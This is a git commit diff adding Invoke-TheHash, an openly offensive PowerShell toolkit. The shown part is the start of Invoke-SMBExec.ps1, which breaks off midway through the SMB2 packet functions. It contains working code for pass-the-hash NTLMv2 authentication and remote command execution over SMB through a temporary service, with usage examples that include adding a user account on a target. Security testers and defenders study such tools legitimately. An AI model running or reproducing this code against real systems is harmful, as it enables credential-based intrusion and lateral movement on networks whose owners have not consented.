diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-01-02 20:29:50 -0500 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-01-02 20:29:50 -0500 |
| commit | af2505ca5973813ba0658b61f61f5acfc09e2e2c (patch) | |
| tree | 23ff727610713d3cf8319adecf2a6019a9de6e6a | |
| parent | 111ec426d06953510ef8b9c5b883628851bfe627 (diff) | |
| download | Invoke-TheHash-af2505ca5973813ba0658b61f61f5acfc09e2e2c.tar.gz Invoke-TheHash-af2505ca5973813ba0658b61f61f5acfc09e2e2c.zip | |
Initial commit
| -rw-r--r-- | Invoke-SMBExec.ps1 | 2305 | ||||
| -rw-r--r-- | Invoke-TheHash.ps1 | 243 | ||||
| -rw-r--r-- | Invoke-TheHash.psd1 | bin | 0 -> 4802 bytes | |||
| -rw-r--r-- | Invoke-TheHash.psm1 | 10 | ||||
| -rw-r--r-- | Invoke-WMIExec.ps1 | 1431 |
5 files changed, 3989 insertions, 0 deletions
diff --git a/Invoke-SMBExec.ps1 b/Invoke-SMBExec.ps1 new file mode 100644 index 0000000..1a2c3a0 --- /dev/null +++ b/Invoke-SMBExec.ps1 @@ -0,0 +1,2305 @@ +function Invoke-SMBExec +{ +<# +.SYNOPSIS +Invoke-SMBExec performs SMBExec style command execution with NTLMv2 pass the hash authentication. Invoke-SMBExec +supports SMB1 and SMB2 with and without SMB signing. + +.PARAMETER Target +Hostname or IP address of target. + +.PARAMETER Username +Username to use for authentication. + +.PARAMETER Domain +Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the +username. + +.PARAMETER Hash +NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. + +.PARAMETER Command +Command to execute on the target. If a command is not specified, the function will check to see if the username +and hash provides local administrator access on the target. + +.PARAMETER CommandCOMSPEC +Default = Enabled: Prepend %COMSPEC% /C to Command. + +.PARAMETER Service +Default = 20 Character Random: Name of the service to create and delete on the target. + +.PARAMETER SMB1 +(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the +target. + +.PARAMETER Sleep +Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this +setting if you are experiencing strange results. + +.EXAMPLE +Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose + +.EXAMPLE +Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "net user SMBExec Winter2017 /add" + +.EXAMPLE +Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 + +.LINK +https://github.com/Kevin-Robertson/Invoke-TheHash + +#> +[CmdletBinding()] +param +( + [parameter(Mandatory=$true)][String]$Target, + [parameter(Mandatory=$true)][String]$Username, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$Command, + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y", + [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, + [parameter(Mandatory=$false)][String]$Service, + [parameter(Mandatory=$false)][Switch]$SMB1, + [parameter(Mandatory=$false)][Int]$Sleep=150 +) + +if($Command) +{ + $SMB_execute = $true +} + +if($SMB1) +{ + $SMB_version = 'SMB1' +} + +function ConvertFrom-PacketOrderedDictionary +{ + param($packet_ordered_dictionary) + + ForEach($field in $packet_ordered_dictionary.Values) + { + $byte_array += $field + } + + return $byte_array +} + +#NetBIOS + +function Get-PacketNetBIOSSessionService() +{ + param([Int]$packet_header_length,[Int]$packet_data_length) + + [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length) + $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0] + + $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary + $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type",[Byte[]](0x00)) + $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length",[Byte[]]($packet_netbios_session_service_length)) + + return $packet_NetBIOSSessionService +} + +#SMB1 + +function Get-PacketSMBHeader() +{ + param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) + + $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBHeader.Add("SMBHeader_Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) + $packet_SMBHeader.Add("SMBHeader_Command",$packet_command) + $packet_SMBHeader.Add("SMBHeader_ErrorClass",[Byte[]](0x00)) + $packet_SMBHeader.Add("SMBHeader_Reserved",[Byte[]](0x00)) + $packet_SMBHeader.Add("SMBHeader_ErrorCode",[Byte[]](0x00,0x00)) + $packet_SMBHeader.Add("SMBHeader_Flags",$packet_flags) + $packet_SMBHeader.Add("SMBHeader_Flags2",$packet_flags2) + $packet_SMBHeader.Add("SMBHeader_ProcessIDHigh",[Byte[]](0x00,0x00)) + $packet_SMBHeader.Add("SMBHeader_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMBHeader.Add("SMBHeader_Reserved2",[Byte[]](0x00,0x00)) + $packet_SMBHeader.Add("SMBHeader_TreeID",$packet_tree_ID) + $packet_SMBHeader.Add("SMBHeader_ProcessID",$packet_process_ID) + $packet_SMBHeader.Add("SMBHeader_UserID",$packet_user_ID) + $packet_SMBHeader.Add("SMBHeader_MultiplexID",[Byte[]](0x00,0x00)) + + return $packet_SMBHeader +} + +function Get-PacketSMBNegotiateProtocolRequest() +{ + param([String]$packet_version) + + if($packet_version -eq 'SMB1') + { + [Byte[]]$packet_byte_count = 0x0c,0x00 + } + else + { + [Byte[]]$packet_byte_count = 0x22,0x00 + } + + $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount",[Byte[]](0x00)) + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount",$packet_byte_count) + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02)) + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00)) + + if($packet_version -ne 'SMB1') + { + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02)) + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00)) + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02)) + $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00)) + } + + return $packet_SMBNegotiateProtocolRequest +} + +function Get-PacketSMBSessionSetupAndXRequest() +{ + param([Byte[]]$packet_security_blob) + + [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length) + $packet_byte_count = $packet_byte_count[0,1] + [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5) + $packet_security_blob_length = $packet_security_blob_length[0,1] + + $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount",[Byte[]](0x0c)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand",[Byte[]](0xff)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved",[Byte[]](0x00)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer",[Byte[]](0xff,0xff)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount",[Byte[]](0x02,0x00)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber",[Byte[]](0x01,0x00)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength",$packet_byte_count) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities",[Byte[]](0x44,0x00,0x00,0x80)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount",$packet_security_blob_length) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob",$packet_security_blob) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS",[Byte[]](0x00,0x00,0x00)) + $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage",[Byte[]](0x00,0x00)) + + return $packet_SMBSessionSetupAndXRequest +} + +function Get-PacketSMBTreeConnectAndXRequest() +{ + param([Byte[]]$packet_path) + + [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7) + $packet_path_length = $packet_path_length[0,1] + + $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount",[Byte[]](0x04)) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand",[Byte[]](0xff)) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved",[Byte[]](0x00)) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags",[Byte[]](0x00,0x00)) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength",[Byte[]](0x01,0x00)) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount",$packet_path_length) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password",[Byte[]](0x00)) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree",$packet_path) + $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00)) + + return $packet_SMBTreeConnectAndXRequest +} + +function Get-PacketSMBNTCreateAndXRequest() +{ + param([Byte[]]$packet_named_pipe) + + [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length) + $packet_named_pipe_length = $packet_named_pipe_length[0,1] + [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1) + $packet_file_name_length = $packet_file_name_length[0,1] + + $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount",[Byte[]](0x18)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand",[Byte[]](0xff)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved",[Byte[]](0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2",[Byte[]](0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen",$packet_file_name_length) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags",[Byte[]](0x16,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask",[Byte[]](0x00,0x00,0x00,0x02)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess",[Byte[]](0x07,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags",[Byte[]](0x00)) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount",$packet_named_pipe_length) + $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename",$packet_named_pipe) + + return $packet_SMBNTCreateAndXRequest +} + +function Get-PacketSMBReadAndXRequest() +{ + $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount",[Byte[]](0x0a)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand",[Byte[]](0xff)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved",[Byte[]](0x00)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID",[Byte[]](0x00,0x40)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow",[Byte[]](0x58,0x02)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount",[Byte[]](0x58,0x02)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown",[Byte[]](0xff,0xff,0xff,0xff)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining",[Byte[]](0x00,0x00)) + $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount",[Byte[]](0x00,0x00)) + + return $packet_SMBReadAndXRequest +} + +function Get-PacketSMBWriteAndXRequest() +{ + param([Int]$packet_RPC_length) + + [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length + 24) + $packet_write_length = $packet_write_length[0,1] + + $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount",[Byte[]](0x0e)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand",[Byte[]](0xff)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved",[Byte[]](0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID",[Byte[]](0x00,0x40)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset",[Byte[]](0xea,0x03,0x00,0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2",[Byte[]](0xff,0xff,0xff,0xff)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode",[Byte[]](0x08,0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining",[Byte[]](0x50,0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh",[Byte[]](0x00,0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow",$packet_write_length) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset",[Byte[]](0x3f,0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount",$packet_write_length) + + return $packet_SMBWriteAndXRequest +} + +function Get-PacketSMBCloseRequest() +{ + param ([Byte[]]$packet_file_ID) + + $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount",[Byte[]](0x03)) + $packet_SMBCloseRequest.Add("SMBCloseRequest_FID",$packet_file_ID) + $packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite",[Byte[]](0xff,0xff,0xff,0xff)) + $packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount",[Byte[]](0x00,0x00)) + + return $packet_SMBCloseRequest +} + +function Get-PacketSMBTreeDisconnectRequest() +{ + $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount",[Byte[]](0x00)) + $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount",[Byte[]](0x00,0x00)) + + return $packet_SMBTreeDisconnectRequest +} + +function Get-PacketSMBLogoffAndXRequest() +{ + $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount",[Byte[]](0x02)) + $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand",[Byte[]](0xff)) + $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved",[Byte[]](0x00)) + $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) + $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount",[Byte[]](0x00,0x00)) + + return $packet_SMBLogoffAndXRequest +} + +#SMB2 + +function Get-PacketSMB2Header() +{ + param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) + + [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 + + $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2Header.Add("SMB2Header_ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42)) + $packet_SMB2Header.Add("SMB2Header_StructureSize",[Byte[]](0x40,0x00)) + $packet_SMB2Header.Add("SMB2Header_CreditCharge",[Byte[]](0x01,0x00)) + $packet_SMB2Header.Add("SMB2Header_ChannelSequence",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("SMB2Header_Reserved",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("SMB2Header_Command",$packet_command) + $packet_SMB2Header.Add("SMB2Header_CreditRequest",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("SMB2Header_Flags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("SMB2Header_NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("SMB2Header_MessageID",$packet_message_ID) + $packet_SMB2Header.Add("SMB2Header_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("SMB2Header_TreeID",$packet_tree_ID) + $packet_SMB2Header.Add("SMB2Header_SessionID",$packet_session_ID) + $packet_SMB2Header.Add("SMB2Header_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + + return $packet_SMB2Header +} + +function Get-PacketSMB2NegotiateProtocolRequest() +{ + $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize",[Byte[]](0x24,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount",[Byte[]](0x02,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode",[Byte[]](0x01,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved",[Byte[]](0x00,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities",[Byte[]](0x40,0x00,0x00,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount",[Byte[]](0x00,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2",[Byte[]](0x00,0x00)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect",[Byte[]](0x02,0x02)) + $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2",[Byte[]](0x10,0x02)) + + return $packet_SMB2NegotiateProtocolRequest +} + +function Get-PacketSMB2SessionSetupRequest() +{ + param([Byte[]]$packet_security_blob) + + [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length) + $packet_security_blob_length = $packet_security_blob_length[0,1] + + $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize",[Byte[]](0x19,0x00)) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags",[Byte[]](0x00)) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode",[Byte[]](0x01)) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset",[Byte[]](0x58,0x00)) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength",$packet_security_blob_length) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer",$packet_security_blob) + + return $packet_SMB2SessionSetupRequest +} + +function Get-PacketSMB2TreeConnectRequest() +{ + param([Byte[]]$packet_path) + + [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length) + $packet_path_length = $packet_path_length[0,1] + + $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize",[Byte[]](0x09,0x00)) + $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved",[Byte[]](0x00,0x00)) + $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset",[Byte[]](0x48,0x00)) + $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength",$packet_path_length) + $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer",$packet_path) + + return $packet_SMB2TreeConnectRequest +} + +function Get-PacketSMB2CreateRequestFile() +{ + param([Byte[]]$packet_named_pipe) + + $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length) + $packet_named_pipe_length = $packet_named_pipe_length[0,1] + + $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize",[Byte[]](0x39,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags",[Byte[]](0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel",[Byte[]](0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes",[Byte[]](0x80,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions",[Byte[]](0x40,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset",[Byte[]](0x78,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength",$packet_named_pipe_length) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer",$packet_named_pipe) + + return $packet_SMB2CreateRequestFile +} + +function Get-PacketSMB2ReadRequest() +{ + param ([Byte[]]$packet_file_ID) + + $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize",[Byte[]](0x31,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding",[Byte[]](0x50)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags",[Byte[]](0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length",[Byte[]](0x00,0x00,0x10,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID",$packet_file_ID) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset",[Byte[]](0x00,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength",[Byte[]](0x00,0x00)) + $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer",[Byte[]](0x30)) + + return $packet_SMB2ReadRequest +} + +function Get-PacketSMB2WriteRequest() +{ + param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length) + + [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length + 24) + + $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize",[Byte[]](0x31,0x00)) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset",[Byte[]](0x70,0x00)) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length",$packet_write_length) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID",$packet_file_ID) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) + 